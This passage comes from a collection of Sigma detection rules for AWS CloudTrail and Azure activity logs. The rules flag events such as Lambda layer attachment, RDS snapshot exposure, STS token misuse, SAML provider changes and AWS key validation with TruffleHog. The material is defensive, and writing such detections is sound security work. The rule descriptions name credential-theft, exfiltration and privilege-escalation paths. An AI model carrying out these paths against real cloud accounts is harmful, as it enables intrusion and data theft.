    "content": "title: AWS New Lambda Layer Attached\nid: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d\nstatus: test\ndescription: |\n  Detects when a user attached a Lambda layer to an existing Lambda function.\n  A malicious Lambda layer could execute arbitrary code in the context of the function's IAM role.\n  This would give an adversary access to resources that the function has access to.\nreferences:\n    - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html\n    - https://github.com/clearvector/lambda-spy\nauthor: Austin Songer\ndate: 2021-09-23\nmodified: 2025-03-17\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: lambda.amazonaws.com\n        eventName|startswith: 'UpdateFunctionConfiguration'\n        requestParameters.layers|contains: '*'\n    condition: selection\nfalsepositives:\n    - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml",
    "content": "title: AWS Glue Development Endpoint Activity\nid: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26\nstatus: test\ndescription: Detects possible suspicious glue development endpoint activity.\nreferences:\n    - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/\n    - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html\nauthor: Austin Songer @austinsonger\ndate: 2021-10-03\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'glue.amazonaws.com'\n        eventName:\n            - 'CreateDevEndpoint'\n            - 'DeleteDevEndpoint'\n            - 'UpdateDevEndpoint'\n    condition: selection\nfalsepositives:\n    - Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml",
    "content": "title: AWS RDS Master Password Change\nid: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2\nstatus: test\ndescription: Detects the change of database master password. It may be a part of data exfiltration.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py\nauthor: faloker\ndate: 2020-02-12\nmodified: 2022-10-05\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: rds.amazonaws.com\n        responseElements.pendingModifiedValues.masterUserPassword|contains: '*'\n        eventName: ModifyDBInstance\n    condition: selection_source\nfalsepositives:\n    - Benign changes to a db instance\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_rds_dbcluster_actions.yml",
    "content": "title: Modification or Deletion of an AWS RDS Cluster\nid: 457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c\nstatus: experimental\ndescription: Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.\nreferences:\n    - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html\n    - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html\n    - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance\nauthor: Ivan Saakov\ndate: 2024-12-06\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: rds.amazonaws.com\n        eventName:\n            - ModifyDBCluster\n            - DeleteDBCluster\n    condition: selection\nfalsepositives:\n    - Verify if the modification or deletion was performed by an authorized administrator.\n    - Confirm if the modification or deletion was part of a planned change or maintenance activity.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml",
    "content": "title: Restore Public AWS RDS Instance\nid: c3f265c7-ff03-4056-8ab2-d486227b4599\nstatus: test\ndescription: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py\nauthor: faloker\ndate: 2020-02-12\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: rds.amazonaws.com\n        responseElements.publiclyAccessible: 'true'\n        eventName: RestoreDBInstanceFromDBSnapshot\n    condition: selection_source\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_root_account_usage.yml",
    "content": "title: AWS Root Credentials\nid: 8ad1600d-e9dc-4251-b0ee-a65268f29add\nstatus: test\ndescription: Detects AWS root account usage\nreferences:\n    - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html\nauthor: vitaliy0x1\ndate: 2020-01-21\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_usertype:\n        userIdentity.type: Root\n    selection_eventtype:\n        eventType: AwsServiceEvent\n    condition: selection_usertype and not selection_eventtype\nfalsepositives:\n    - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml",
    "content": "title: AWS Route 53 Domain Transfer Lock Disabled\nid: 3940b5f1-3f46-44aa-b746-ebe615b879e0\nstatus: test\ndescription: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml\n    - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html\n    - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html\nauthor: Elastic, Austin Songer @austinsonger\ndate: 2021-07-22\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1098\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: route53.amazonaws.com\n        eventName: DisableDomainTransferLock\n    condition: selection\nfalsepositives:\n    - A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml",
    "content": "title: AWS Route 53 Domain Transferred to Another Account\nid: b056de1a-6e6e-4e40-a67e-97c9808cf41b\nstatus: test\ndescription: Detects when a request has been made to transfer a Route 53 domain to another AWS account.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml\nauthor: Elastic, Austin Songer @austinsonger\ndate: 2021-07-22\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.credential-access\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: route53.amazonaws.com\n        eventName: TransferDomainToAnotherAwsAccount\n    condition: selection\nfalsepositives:\n    - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml",
    "content": "title: AWS S3 Data Management Tampering\nid: 78b3756a-7804-4ef7-8555-7b9024a02e2d\nstatus: test\ndescription: Detects when a user tampers with S3 data management in Amazon Web Services.\nreferences:\n    - https://github.com/elastic/detection-rules/pull/1145/files\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1537\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: s3.amazonaws.com\n        eventName:\n            - PutBucketLogging\n            - PutBucketWebsite\n            - PutEncryptionConfiguration\n            - PutLifecycleConfiguration\n            - PutReplicationConfiguration\n            - ReplicateObject\n            - RestoreObject\n    condition: selection\nfalsepositives:\n    - A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml",
    "content": "title: AWS SecurityHub Findings Evasion\nid: a607e1fe-74bf-4440-a3ec-b059b9103157\nstatus: stable\ndescription: Detects the modification of the findings on SecurityHub.\nreferences:\n    - https://docs.aws.amazon.com/cli/latest/reference/securityhub/\nauthor: Sittikorn S\ndate: 2021-06-28\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: securityhub.amazonaws.com\n        eventName:\n            - 'BatchUpdateFindings'\n            - 'DeleteInsight'\n            - 'UpdateFindings'\n            - 'UpdateInsight'\n    condition: selection\nfalsepositives:\n    - System or Network administrator behaviors\n    - DEV, UAT, SAT environment. You should apply this rule with PROD environment only.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml",
    "content": "title: AWS Snapshot Backup Exfiltration\nid: abae8fec-57bd-4f87-aff6-6e3db989843d\nstatus: test\ndescription: Detects the modification of an EC2 snapshot's permissions to enable access from another account\nreferences:\n    - https://www.justice.gov/file/1080281/download\nauthor: Darin Smith\ndate: 2021-05-17\nmodified: 2021-08-19\ntags:\n    - attack.exfiltration\n    - attack.t1537\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: ec2.amazonaws.com\n        eventName: ModifySnapshotAttribute\n    condition: selection_source\nfalsepositives:\n    - Valid change to a snapshot's permissions\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml",
    "content": "title: AWS Identity Center Identity Provider Change\nid: d3adb3ef-b7e7-4003-9092-1924c797db35\nstatus: test\ndescription: |\n    Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.\n    A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.\nreferences:\n    - https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html\n    - https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html\n    - https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html\nauthor: Michael McIntyre @wtfender\ndate: 2023-09-27\ntags:\n    - attack.persistence\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1556\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource:\n            - 'sso-directory.amazonaws.com'\n            - 'sso.amazonaws.com'\n        eventName:\n            - 'AssociateDirectory'\n            - 'DisableExternalIdPConfigurationForDirectory'\n            - 'DisassociateDirectory'\n            - 'EnableExternalIdPConfigurationForDirectory'\n    condition: selection\nfalsepositives:\n    - Authorized changes to the AWS account's identity provider\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml",
    "content": "title: AWS STS AssumeRole Misuse\nid: 905d389b-b853-46d0-9d3d-dea0d3a3cd49\nstatus: test\ndescription: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.\nreferences:\n    - https://github.com/elastic/detection-rules/pull/1214\n    - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548\n    - attack.t1550\n    - attack.t1550.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        userIdentity.type: AssumedRole\n        userIdentity.sessionContext.sessionIssuer.type: Role\n    condition: selection\nfalsepositives:\n    - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\n    - Automated processes that uses Terraform may lead to false positives.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_sts_getcalleridentity_trufflehog.yml",
    "content": "title: AWS STS GetCallerIdentity Enumeration Via TruffleHog\nid: 9b1b8e9b-0a5d-4af1-9d2f-4c4b6e7c2c9d\nstatus: experimental\ndescription: |\n    Detects the use of TruffleHog for AWS credential validation by identifying GetCallerIdentity API calls where the userAgent indicates TruffleHog.\n    Threat actors leverage TruffleHog to enumerate and validate exposed AWS keys.\n    Successful exploitation allows threat actors to confirm the validity of compromised AWS credentials, facilitating further unauthorized access and actions within the AWS environment.\nreferences:\n    - https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/\n    - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetCallerIdentity.html\n    - https://github.com/trufflesecurity/trufflehog\nauthor: Adan Alvarez @adanalvarez\ndate: 2025-10-12\ntags:\n    - attack.discovery\n    - attack.t1087.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'sts.amazonaws.com'\n        eventName: 'GetCallerIdentity'\n        userAgent|contains: 'TruffleHog'\n    condition: selection\nfalsepositives:\n    - Legitimate internal security scanning or key validation that intentionally uses TruffleHog. Authorize and filter known scanner roles, IP ranges, or assumed roles as needed.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml",
    "content": "title: AWS STS GetSessionToken Misuse\nid: b45ab1d2-712f-4f01-a751-df3826969807\nstatus: test\ndescription: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.\nreferences:\n    - https://github.com/elastic/detection-rules/pull/1213\n    - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548\n    - attack.t1550\n    - attack.t1550.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: sts.amazonaws.com\n        eventName: GetSessionToken\n        userIdentity.type: IAMUser\n    condition: selection\nfalsepositives:\n    - GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml",
    "content": "title: AWS Suspicious SAML Activity\nid: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e\nstatus: test\ndescription: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.\nreferences:\n    - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html\n    - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html\nauthor: Austin Songer\ndate: 2021-09-22\nmodified: 2022-12-18\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\n    - attack.t1548\n    - attack.t1550\n    - attack.t1550.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_sts:\n        eventSource: 'sts.amazonaws.com'\n        eventName: 'AssumeRoleWithSAML'\n    selection_iam:\n        eventSource: 'iam.amazonaws.com'\n        eventName: 'UpdateSAMLProvider'\n    condition: 1 of selection_*\nfalsepositives:\n    - Automated processes that uses Terraform may lead to false positives.\n    - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_update_login_profile.yml",
    "content": "title: AWS User Login Profile Was Modified\nid: 055fb148-60f8-462d-ad16-26926ce050f1\nstatus: test\ndescription: |\n    Detects activity when someone is changing passwords on behalf of other users.\n    An attacker with the \"iam:UpdateLoginProfile\" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nreferences:\n    - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation\nauthor: toffeebr33k\ndate: 2021-08-09\nmodified: 2024-04-26\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'iam.amazonaws.com'\n        eventName: 'UpdateLoginProfile'\n    filter_main_user_identity:\n        userIdentity.arn|fieldref: requestParameters.userName\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate user account administration\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml",
    "content": "title: Azure Active Directory Hybrid Health AD FS New Server\nid: 288a39fc-4914-4831-9ada-270e9dc12cb4\nstatus: test\ndescription: |\n    This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\n    A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\n    This can be done programmatically via HTTP requests to Azure.\nreferences:\n    - https://o365blog.com/post/hybridhealthagent/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-08-26\nmodified: 2023-10-11\ntags:\n    - attack.defense-evasion\n    - attack.t1578\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        CategoryValue: 'Administrative'\n        ResourceProviderValue: 'Microsoft.ADHybridHealthService'\n        ResourceId|contains: 'AdFederationService'\n        OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action'\n    condition: selection\nfalsepositives:\n    - Legitimate AD FS servers added to an AAD Health AD FS service instance\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml",
    "content": "title: Azure Active Directory Hybrid Health AD FS Service Delete\nid: 48739819-8230-4ee3-a8ea-e0289d1fb0ff\nstatus: test\ndescription: |\n    This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\n    A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\n    The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\nreferences:\n    - https://o365blog.com/post/hybridhealthagent/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-08-26\nmodified: 2023-10-11\ntags:\n    - attack.defense-evasion\n    - attack.t1578.003\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        CategoryValue: 'Administrative'\n        ResourceProviderValue: 'Microsoft.ADHybridHealthService'\n        ResourceId|contains: 'AdFederationService'\n        OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete'\n    condition: selection\nfalsepositives:\n    - Legitimate AAD Health AD FS service instances being deleted in a tenant\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml",
    "content": "title: User Added to an Administrator's Azure AD Role\nid: ebbeb024-5b1d-4e16-9c0c-917f86c708a7\nstatus: test\ndescription: User Added to an Administrator's Azure AD Role\nreferences:\n    - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/\nauthor: Raphaël CALVET, @MetallicHack\ndate: 2021-10-04\nmodified: 2022-10-09\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098.003\n    - attack.t1078\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        Operation: 'Add member to role.'\n        Workload: 'AzureActiveDirectory'\n        ModifiedProperties{}.NewValue|endswith:\n            - 'Admins'\n            - 'Administrator'\n    condition: selection\nfalsepositives:\n    - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_application_deleted.yml",
    "content": "title: Azure Application Deleted\nid: 410d2a41-1e6d-452f-85e5-abdd8257a823\nstatus: test\ndescription: Identifies when a application is deleted in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message:\n            - Delete application\n            - Hard Delete application\n    condition: selection\nfalsepositives:\n    - Application being deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml",
    "content": "title: Azure Application Gateway Modified or Deleted\nid: ad87d14e-7599-4633-ba81-aeb60cfe8cd6\nstatus: test\ndescription: Identifies when a application gateway is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE\n            - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE\n    condition: selection\nfalsepositives:\n    - Application gateway being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml",
    "content": "title: Azure Application Security Group Modified or Deleted\nid: 835747f1-9329-40b5-9cc3-97d465754ce6\nstatus: test\ndescription: Identifies when a application security group is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE\n            - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE\n    condition: selection\nfalsepositives:\n    - Application security group being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml",
    "content": "title: Azure Container Registry Created or Deleted\nid: 93e0ef48-37c8-49ed-a02c-038aab23628e\nstatus: test\ndescription: Detects when a Container Registry is created or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE\n            - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE\n    condition: selection\nfalsepositives:\n    - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml",
    "content": "title: Number Of Resource Creation Or Deployment Activities\nid: d2d901db-7a75-45a1-bc39-0cbf00812192\nstatus: test\ndescription: Number of VM creations or deployment activities occur in Azure via the azureactivity log.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml\nauthor: sawwinnnaung\ndate: 2020-05-07\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    keywords:\n        - Microsoft.Compute/virtualMachines/write\n        - Microsoft.Resources/deployments/write\n    condition: keywords\nfalsepositives:\n    - Valid change\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml",
    "content": "title: Azure Device No Longer Managed or Compliant\nid: 542b9912-c01f-4e3f-89a8-014c48cdca7d\nstatus: test\ndescription: Identifies when a device in azure is no longer managed or compliant\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message:\n            - Device no longer compliant\n            - Device no longer managed\n    condition: selection\nfalsepositives:\n    - Administrator may have forgotten to review the device.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml",
    "content": "title: Azure Device or Configuration Modified or Deleted\nid: 46530378-f9db-4af9-a9e5-889c177d3881\nstatus: test\ndescription: Identifies when a device or device configuration in azure is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1565.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message:\n            - Delete device\n            - Delete device configuration\n            - Update device\n            - Update device configuration\n    condition: selection\nfalsepositives:\n    - Device or device configuration being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml",
    "content": "title: Azure DNS Zone Modified or Deleted\nid: af6925b0-8826-47f1-9324-337507a0babd\nstatus: test\ndescription: Identifies when DNS zone is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1565.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName|startswith: 'MICROSOFT.NETWORK/DNSZONES'\n        operationName|endswith:\n            - '/WRITE'\n            - '/DELETE'\n    condition: selection\nfalsepositives:\n    - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml",
